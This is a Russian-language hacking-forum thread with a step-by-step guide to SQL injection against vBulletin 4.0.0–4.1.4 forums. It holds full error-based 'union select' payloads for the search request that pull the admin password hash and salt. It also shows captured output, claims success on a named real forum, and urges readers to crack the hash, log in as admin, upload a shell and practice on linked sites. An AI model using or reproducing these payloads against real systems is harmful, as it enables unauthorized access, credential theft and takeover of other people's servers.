Регистрация Главная Сообщество
Сообщения за день Справка Регистрация

vBulletin 4.0.0-4.1.4

-

Базы серверов и брут

- Все, что связано с брутом и работой с базами данных

Закрытая тема
 
Опции темы
Старый 25.09.2011, 19:08   #1
 Капитан
Аватар для Excellent18rus
 
Excellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе цену
Регистрация: 07.04.2010
Сообщений: 293
Популярность: 4393
Сказал(а) спасибо: 133
Поблагодарили 334 раз(а) в 187 сообщениях
Отправить сообщение для Excellent18rus с помощью ICQ
 
Exclamation vBulletin 4.0.0-4.1.4

Значит находим сервер, у которого форум на vBulletin(далее булка) 4-4.1.4
как узнать версию форума КЛАЦ

далее нам нужен Firefox и расширение в файрфоксе [Ссылки могут видеть только зарегистрированные пользователи. ]

для примера возьму все тот же
[Ссылки могут видеть только зарегистрированные пользователи. ]
как установили - заходим на форум
включаем расширение(инструменты - просмотр HTTP заголовков)
пишем любой запрос в поиске...

нам выдало
Код:
Извините, нет совпадений. Попробуйте указать другие ключевые слова.
ну или что-то нашло, без разницы

переходим в наше расширение , ищем POST запрос, он будет первый...

жмете на него и Повтор

редактируете его так, чтобы у вас остался только
securitytoken
в моем случае(я не авторизирован)
securitytoken=guest&

добавляем к нему
Код:
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
должно быть так
Код:
securitytoken=guest&humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
вылазит ошибка, смотрим исходный код... внизу будет строка...


Ошибка MySQL : Duplicate entry 'b748e33ba276a9510af799c1fb6f0c79:1' for key 'group_key'

вот хеш b748e33ba276a9510af799c1fb6f0c79

теперь достаем соль...
к securitytoken добавляем
Код:
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select salt from user where userid=1 and row(1,1)>(select count(*),concat( (select user.salt) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
выдало
Ошибка MySQL : Duplicate entry 'T`xnenL7XS|)!si5<BE@O^yu-vYG{0:1' for key 'group_key'

соль - T`xnenL7XS|)!si5&BE@O^yu-vYG{0
вроде все

выскакивает ошибка - в исходном коде будет Хеш пользователя с ID 1



у нас получилось
b748e33ba276a9510af799c1fb6f0c79:T`xnenL7XS|)!si5& BE@O^yu-vYG{0
хеш:соль юзера с ИД=1
т.е админа..
расшифровываем его и заходим за админа.. далее заливаем шелл...

тип хеша md5(md5($pass)$salt)

Работало на форуме 4game ;D

в запросе везде есть
userid=1
это ИД юзера чьего берем Хеш и соль...
меняйте если у админа ID не 1 или их несколько... будет больше шансов расшифровать...
извиняюсь что много буковок и нет скринов, если надо сделаю
вроде бы все расписал

как заливать шелл поищите в интернете


тренируйтесь
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]


******************************
//4ipolino
Обсуждение уязвимости http://zhyk.ru/forum/showthread.php?t=273203
тему закрепил
[ Важные/полезные темы ] Навигация по разделу

Последний раз редактировалось 4ipolino; 26.09.2011 в 10:34.
 
16 пользователя(ей) сказали cпасибо:
3a4eT (25.09.2011), 4ipolino (26.09.2011), 666Death666 (25.09.2011), DeathAngel (07.01.2012), DimDon (26.09.2011), DizTerDiz (01.10.2011), flint23 (28.09.2011), love2 (25.09.2011), MEAT97 (13.10.2012), molodoyhacker (26.09.2011), mond1ke (25.09.2011), Mr_R@NDOM (01.10.2011), Sh0ckk (02.10.2011), Withyou (26.09.2011), `~{OmRus}~` (25.09.2011), ~Nero~ (26.09.2011)
Закрытая тема


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проблемма с vBulletin 3.5.2 FtpFun Школа Читера 1 08.08.2011 23:25
помогите с vbulletin FunFtp Школа Читера 3 06.08.2011 11:58
[Уязвимость] vbulletin 3.8.6 -=Angel=- Базы серверов и брут 10 28.03.2011 15:32
[Услуги] Брут vBulletin 4,0,0 Alexander6107 Товары/услуги в Сети 0 12.08.2010 12:54
[Помогите!] VBulletin lawliet94 Вопросы и ответы, обсуждения 6 03.08.2010 16:49

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 02:44.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net